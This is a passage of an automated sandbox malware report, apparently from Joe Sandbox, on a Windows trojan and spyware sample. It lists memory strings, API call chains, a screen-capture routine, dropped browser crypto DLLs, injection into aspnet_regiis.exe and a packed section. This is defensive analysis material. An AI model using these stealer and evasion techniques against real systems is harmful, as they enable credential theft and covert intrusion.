Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
Source: aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	String found in binary or memory: https://www.mozilla.org
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/VxHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: aspnet_regiis.exe, 00000002.00000003.1787303428.000000002913A000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: aspnet_regiis.exe, 00000002.00000003.1787303428.000000002913A000.00000004.00000020.00020000.00000000.sdmp, ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_02765700 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow,

2_2_02765700

System Summary

PE file contains section with special chars

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Static PE information: section name: A7B&<U

PE file has nameless sections

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Static PE information: section name:

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC22630 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,	0_2_6CC22630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2CED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	2_2_6C2CED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C30B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	2_2_6C30B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C30B8C0 rand_s,NtQueryVirtualMemory,	2_2_6C30B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C30B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	2_2_6C30B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2AF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	2_2_6C2AF280

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC211C0	0_2_6CC211C0
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC22630	0_2_6CC22630
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC22FB0	0_2_6CC22FB0
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC22C50	0_2_6CC22C50
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC35465	0_2_6CC35465
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC21000	0_2_6CC21000
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: 0_2_6CC29A80	0_2_6CC29A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2A35A0	2_2_6C2A35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C31542B	2_2_6C31542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C31AC00	2_2_6C31AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2E5C10	2_2_6C2E5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2F2C10	2_2_6C2F2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2B5440	2_2_6C2B5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C31545C	2_2_6C31545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3034A0	2_2_6C3034A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C30C4A0	2_2_6C30C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2B6C80	2_2_6C2B6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2AD4E0	2_2_6C2AD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2E6CF0	2_2_6C2E6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2B64C0	2_2_6C2B64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2CD4D0	2_2_6C2CD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2BFD00	2_2_6C2BFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2CED10	2_2_6C2CED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2D0512	2_2_6C2D0512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3085F0	2_2_6C3085F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2E0DD0	2_2_6C2E0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C309E30	2_2_6C309E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2F5600	2_2_6C2F5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2E7E10	2_2_6C2E7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C316E63	2_2_6C316E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2AC670	2_2_6C2AC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2F2E4E	2_2_6C2F2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2C4640	2_2_6C2C4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2C9E50	2_2_6C2C9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2E3E50	2_2_6C2E3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C304EA0	2_2_6C304EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C30E680	2_2_6C30E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2C5E90	2_2_6C2C5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3176E3	2_2_6C3176E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2ABEF0	2_2_6C2ABEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2BFEF0	2_2_6C2BFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2B9F00	2_2_6C2B9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2E7710	2_2_6C2E7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2F77A0	2_2_6C2F77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2ADFE0	2_2_6C2ADFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2D6FF0	2_2_6C2D6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2EB820	2_2_6C2EB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2F4820	2_2_6C2F4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2B7810	2_2_6C2B7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2EF070	2_2_6C2EF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2C8850	2_2_6C2C8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2CD850	2_2_6C2CD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2D60A0	2_2_6C2D60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2CC0E0	2_2_6C2CC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2E58E0	2_2_6C2E58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3150C7	2_2_6C3150C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C31B170	2_2_6C31B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2BD960	2_2_6C2BD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2FB970	2_2_6C2FB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2CA940	2_2_6C2CA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2AC9A0	2_2_6C2AC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2DD9B0	2_2_6C2DD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C302990	2_2_6C302990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2E5190	2_2_6C2E5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2E9A60	2_2_6C2E9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C312AB0	2_2_6C312AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2A22A0	2_2_6C2A22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2D4AA0	2_2_6C2D4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2BCAB0	2_2_6C2BCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C31BA90	2_2_6C31BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2C1AF0	2_2_6C2C1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2EE2F0	2_2_6C2EE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2E8AC0	2_2_6C2E8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2ED320	2_2_6C2ED320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2BC370	2_2_6C2BC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2A5340	2_2_6C2A5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C2AF380	2_2_6C2AF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3153C8	2_2_6C3153C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C416C00	2_2_6C416C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C35AC60	2_2_6C35AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C42AC30	2_2_6C42AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3AECD0	2_2_6C3AECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C34ECC0	2_2_6C34ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C47AD50	2_2_6C47AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C41ED70	2_2_6C41ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C4D8D20	2_2_6C4D8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C354DB0	2_2_6C354DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C4DCDC0	2_2_6C4DCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3E6D90	2_2_6C3E6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3EEE70	2_2_6C3EEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C430E20	2_2_6C430E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3D6E90	2_2_6C3D6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C35AEC0	2_2_6C35AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3F0EC0	2_2_6C3F0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C356F10	2_2_6C356F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C412F70	2_2_6C412F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C490F20	2_2_6C490F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3BEF40	2_2_6C3BEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C35EFB0	2_2_6C35EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C42EFF0	2_2_6C42EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C350FE0	2_2_6C350FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C498FB0	2_2_6C498FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C424840	2_2_6C424840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3A0820	2_2_6C3A0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3DA820	2_2_6C3DA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C4568E0	2_2_6C4568E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3A6900	2_2_6C3A6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C388960	2_2_6C388960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3E09A0	2_2_6C3E09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C46C9E0	2_2_6C46C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3849F0	2_2_6C3849F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C40A9A0	2_2_6C40A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C4109B0	2_2_6C4109B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3FEA00	2_2_6C3FEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3CCA70	2_2_6C3CCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C408A30	2_2_6C408A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3CEA80	2_2_6C3CEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3F0BA0	2_2_6C3F0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C456BE0	2_2_6C456BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3DA430	2_2_6C3DA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3B4420	2_2_6C3B4420

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 6C4DDAE0 appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 027543B0 appears 316 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 6C2E94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 6C2DCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: String function: 6C4D09D0 appears 121 times
Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Code function: String function: 6CC2A9F0 appears 33 times

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe, 00000000.00000000.1679333257.00000000007C8000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAMD69317154114.exeX vs f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Binary or memory string: OriginalFilenameAMD69317154114.exeX vs f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Static PE information: Section: A7B&<U ZLIB complexity 0.9998899647887324

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/23@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_6C307030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

2_2_6C307030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_02765CF0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

2_2_02765CF0

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

File created: C:\Users\user\AppData\Roaming\d3d9.dll

Jump to behavior

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03

Source: f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: aspnet_regiis.exe, 00000002.00000002.1824613866.000000006C4DF000.00000002.00000001.01000000.0000000A.sdmp, aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824067945.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
